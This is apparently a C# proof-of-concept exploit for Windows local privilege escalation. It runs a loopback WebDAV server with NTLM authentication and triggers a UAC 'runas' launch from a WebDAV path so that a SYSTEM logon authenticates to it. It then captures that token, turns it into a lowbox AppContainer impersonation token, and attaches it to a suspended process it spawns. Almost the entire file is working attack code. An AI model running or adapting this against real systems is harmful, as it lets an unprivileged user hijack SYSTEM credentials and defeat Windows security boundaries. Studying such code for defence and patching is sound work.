﻿using ExampleApp;
using NtApiDotNet;
using NtApiDotNet.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Text;
using System.Threading;
using System.Xml;

namespace NtlmAuth
{
    // netsh http add urlacl url=http://127.0.0.1:4444/WebDAV user=Everyone

    class Program
    {
        static string GetPath(HttpListenerContext context)
        {
            var url = context.Request.Url;

            return url.PathAndQuery.Substring(8).Replace('/', '\\');
        }

        static void HandleOptions(HttpListenerContext context)
        {
            var response = context.Response;
            response.Headers.Add("Allow", "OPTIONS, GET, HEAD, PROPFIND");
            response.StatusCode = 200;
        }

        static void CreateResponse(XmlWriter writer, FileSystemInfo file, string path)
        {
            writer.WriteStartElement("response", DavNamespace);
            writer.WriteElementString("href", DavNamespace, path);
            CreatePropStat(writer, file);
            writer.WriteEndElement();
        }

        static byte[] CreateMultiStatus(HttpListenerContext context, string path, FileSystemInfo file_obj)
        {
            var headers = context.Request.Headers;
            string depth_str = headers["Depth"];
            if (string.IsNullOrWhiteSpace(depth_str) || !int.TryParse(depth_str, out int depth))
            {
                depth = 0;
            }

            XmlWriterSettings settings = new XmlWriterSettings
            {
                Encoding = Encoding.UTF8
            };
            MemoryStream stm = new MemoryStream();
            XmlWriter writer = XmlWriter.Create(stm);
            writer.WriteStartElement("multistatus", DavNamespace);

            CreateResponse(writer, file_obj, path);

            if (depth > 0 && file_obj is DirectoryInfo root_dir)
            {
                foreach (FileSystemInfo file in root_dir.GetFileSystemInfos())
                {
                    CreateResponse(writer, file, string.Format("{0}/{1}", path, file.Name));
                }
            }

            writer.WriteEndElement();
            writer.Close();

            return stm.ToArray();
        }

        static FileSystemInfo GetFileInfo(DirectoryInfo root_dir, string path)
        {
            if (path.StartsWith("/WebDAV"))
            {
                if (path.Equals("/WebDAV", StringComparison.OrdinalIgnoreCase))
                {
                    return root_dir;
                }
                else
                {
                    string full_path = Path.Combine(root_dir.FullName, path.Substring(7).TrimStart('/'));
                    Console.WriteLine("Checking {0}", full_path);
                    if (File.Exists(full_path))
                    {
                        return new FileInfo(full_path);
                    }
                    else if (Directory.Exists(full_path))
                    {
                        return new DirectoryInfo(full_path);
                    }
                }
            }
            return null;
        }

        static void HandlePropFind(DirectoryInfo root_dir, HttpListenerContext context)
        {
            byte[] data = new byte[context.Request.ContentLength64];
            context.Request.InputStream.Read(data, 0, data.Length);
            var response = context.Response;
            string path = Uri.UnescapeDataString(context.Request.Url.PathAndQuery.TrimEnd('/'));

            FileSystemInfo file = GetFileInfo(root_dir, path);
            if (file != null && file.Exists)
            {
                byte[] result = CreateMultiStatus(context, path, file);
                Console.WriteLine(Encoding.UTF8.GetString(result));
                response.ContentLength64 = result.LongLength;
                var os = response.OutputStream;
                os.Write(result, 0, result.Length);
                response.ContentType = "text/xml";
                response.StatusCode = 207;
            }
            else
            {
                Console.WriteLine("{0} doesn't exist", path);
                response.StatusCode = 404;
            }
        }

        static void HandleGet(DirectoryInfo root_dir, HttpListenerContext context)
        {
            byte[] data = new byte[context.Request.ContentLength64];
            context.Request.InputStream.Read(data, 0, data.Length);
            var response = context.Response;
            string path = Uri.UnescapeDataString(context.Request.Url.PathAndQuery.TrimEnd('/'));
            FileSystemInfo file = GetFileInfo(root_dir, path);
            if (file != null && file.Exists)
            {
                Console.WriteLine("Opening file {0}", file.FullName);
                byte[] result = File.ReadAllBytes(file.FullName);
                response.ContentLength64 = result.LongLength;
                var os = response.OutputStream;
                os.Write(result, 0, result.Length);
                response.StatusCode = 200;
            }
            else
            {
                Console.WriteLine("Couldn't open file {0}", file?.FullName);
                response.StatusCode = 404;
            }
        }

        const string DavNamespace = "DAV:";

        static void CreatePropStat(XmlWriter writer, FileSystemInfo file)
        {
            writer.WriteStartElement("propstat", DavNamespace);
            writer.WriteStartElement("prop", DavNamespace);
            // 1997-12-01T17:42:21-08:00
            DateTime last_write = file.LastWriteTimeUtc;
            writer.WriteElementString("getlastmodified", DavNamespace, last_write.ToString("ddd, d MMM yyyy hh:mm:ss \\G\\M\\T", System.Globalization.CultureInfo.InvariantCulture));
            writer.WriteElementString("creationdate", DavNamespace, file.CreationTimeUtc.ToString("yyyy-MM-ddThh:mm:ssZ", System.Globalization.CultureInfo.InvariantCulture));
            writer.WriteStartElement("resourcetype", DavNamespace);
            if (file is DirectoryInfo)
            {
                writer.WriteElementString("collection", DavNamespace, String.Empty);
            }
            writer.WriteEndElement();
            if (file is FileInfo file_info)
            {
                writer.WriteElementString("getcontentlength", DavNamespace, file_info.Length.ToString());
            }
            writer.WriteEndElement();
            writer.WriteElementString("status", DavNamespace, "HTTP/1.1 200 OK");
            writer.WriteEndElement();
        }

        [DllImport("advapi32.dll")]
        static extern int EventRegister(
            ref Guid ProviderId,
            IntPtr EnableCallback,
            IntPtr CallbackContext,
            out IntPtr RegHandle
        );

        [DllImport("advapi32.dll")]
        static extern int EventUnregister(
            IntPtr RegHandle
        );

        [DllImport("advapi32.dll")]
        static extern int EventWrite(
            IntPtr RegHandle,
            ref EVENT_DESCRIPTOR EventDescriptor,
            int UserDataCount,
            IntPtr UserData
        );

        [StructLayout(LayoutKind.Sequential)]
        struct EVENT_DESCRIPTOR
        {
            public ushort Id;
            public byte Version;
            public byte Channel;
            public byte Level;
            public byte Opcode;
            public ushort Task;
            public ulong Keyword;
        }

        static bool StartWebClientService()
        {
            Guid etw = new Guid("22b6d684-fa63-4578-87c9-effcbe6643c7");
            if (EventRegister(ref etw,
                    IntPtr.Zero, IntPtr.Zero, out IntPtr Handle) != 0)
            {
                return false;
            }

            EVENT_DESCRIPTOR desc = new EVENT_DESCRIPTOR
            {
                Id = 1,
                Version = 0,
                Channel = 0,
                Level = 4,
                Opcode = 0,
                Task = 0,
                Keyword = 0
            };
            try
            {
                return EventWrite(Handle, ref desc, 0, IntPtr.Zero) == 0;
            }
            finally
            {
                EventUnregister(Handle);
            }
        }

        static string BASE_DIR = Path.Combine(Path.GetTempPath(), Guid.NewGuid().ToString());
        static string BASE_EXE = Path.Combine(BASE_DIR, "program.exe");

        static void CreateExecutable()
        {

            DirectorySecurity security = new DirectorySecurity();
            security.SetSecurityDescriptorSddlForm("D:(A;;GA;;;WD)(A;;GA;;;AC)(A;OICI;GA;;;WD)(A;OICI;GA;;;AC)");
            Directory.CreateDirectory(BASE_DIR, security);
            File.Copy(typeof(DummyClass).Assembly.Location, BASE_EXE);
        }

        static void RunWithUAC()
        {
            Thread.Sleep(5000);

            string path = @"\\localhost@4444\WebDAV\" + Path.GetFileName(typeof(Program).Assembly.Location);
            Console.WriteLine("Starting {0} under UAC", path);
            ProcessStartInfo si = new ProcessStartInfo(path, "/dummy")
            {
                Verb = "runas",
                UseShellExecute = true
            };
            try
            {
                using (Process p = Process.Start(si))
                {
                }
            }
            catch
            {
            }
        }

        static void Main(string[] args)
        {
            try
            {
                if (args.Length > 1)
                {
                    return;
                }

                CreateExecutable();
                StartWebClientService();
                
                NtToken current_token = NtToken.OpenProcessToken();

                //string base_path = args.Length > 0 ? args[0] : ".";
                string base_path = Path.GetDirectoryName(typeof(Program).Assembly.Location);
                DirectoryInfo root_dir = new DirectoryInfo(base_path);
                if (!root_dir.Exists)
                {
                    throw new ArgumentException(string.Format("Path {0} doesn't exist", base_path));
                }

                using (HttpListener listener = new HttpListener())
                {
                    listener.Prefixes.Add("http://127.0.0.1:4444/WebDAV/");
                    listener.AuthenticationSchemes = AuthenticationSchemes.Ntlm;
                    listener.Start();
                    Thread t = new Thread(RunWithUAC)
                    {
                        IsBackground = true
                    };
                    t.Start();

                    while (true)
                    {
                        var context = listener.GetContext();
                        WindowsPrincipal principal = context.User as WindowsPrincipal;
                        WindowsIdentity id = principal.Identity as WindowsIdentity;
                        Console.WriteLine("{0} {1}", context.Request.HttpMethod, context.Request.Url.PathAndQuery);
                        NtToken token = NtToken.FromHandle(new SafeKernelObjectHandle(id.Token, false));

                        Console.WriteLine(token.User.ToString());
                        Console.WriteLine(token.ImpersonationLevel);
                        Console.WriteLine("Session: {0}", token.SessionId);
                        Console.WriteLine("LowBox: {0}", token.AppContainer);

                        if ((token.SessionId == current_token.SessionId) && (token.User.Sid == KnownSids.LocalSystem) && !token.AppContainer)
                        {
                            SpawnProcess(token);
                        }

                        switch (context.Request.HttpMethod.ToUpper())
                        {
                            case "OPTIONS":
                                HandleOptions(context);
                                break;
                            case "PROPFIND":
                                HandlePropFind(root_dir, context);
                                break;
                            case "GET":
                                HandleGet(root_dir, context);
                                break;
                            default:
                                context.Response.StatusCode = 500;
                                break;
                        }

                        context.Response.Close();
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }

        private static void SpawnProcess(NtToken token)
        {
            Console.WriteLine("Spawning new process");
            SecurityDescriptor sd = new SecurityDescriptor("D:(A;;GA;;;WD)(A;;GA;;;AC)");
            Sid acsid = new Sid("S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194");
            List<Sid> caps = new List<Sid>
            {
                KnownSids.CapabilityConstrainedImpersonation,
                KnownSids.CapabilityEnterpriseAuthentication,
                KnownSids.CapabilityInternetClient,
                KnownSids.CapabilityInternetClientServer,
                KnownSids.CapabilityPrivateNetworkClientServer
            };

            Win32ProcessConfig config = new Win32ProcessConfig
            {
                CreationFlags = CreateProcessFlags.Suspended,
                CurrentDirectory = Environment.GetFolderPath(Environment.SpecialFolder.System),
                AppContainerSid = acsid,
                ApplicationName = BASE_EXE,
                CommandLine = BASE_EXE,
                ProcessSecurityDescriptor = sd,
                ThreadSecurityDescriptor = sd
            };
            config.Capabilities.AddRange(caps);

            using (Win32Process process = Win32Process.CreateProcess(config))
            {
                Console.WriteLine("Created process {0}", process.Pid);
                using (NtToken lowbox = token.CreateLowBoxToken(acsid, caps, new NtObject[0], TokenAccessRights.GenericAll))
                {
                    using (NtToken imp_token = lowbox.DuplicateToken(TokenType.Impersonation, SecurityImpersonationLevel.Impersonation, TokenAccessRights.GenericAll))
                    {
                        imp_token.SetSecurityDescriptor(sd, SecurityInformation.Dacl);
                        process.Thread.SetImpersonationToken(imp_token);
                        process.Process.Resume();
                    }
                }
            }
        }
    }
}
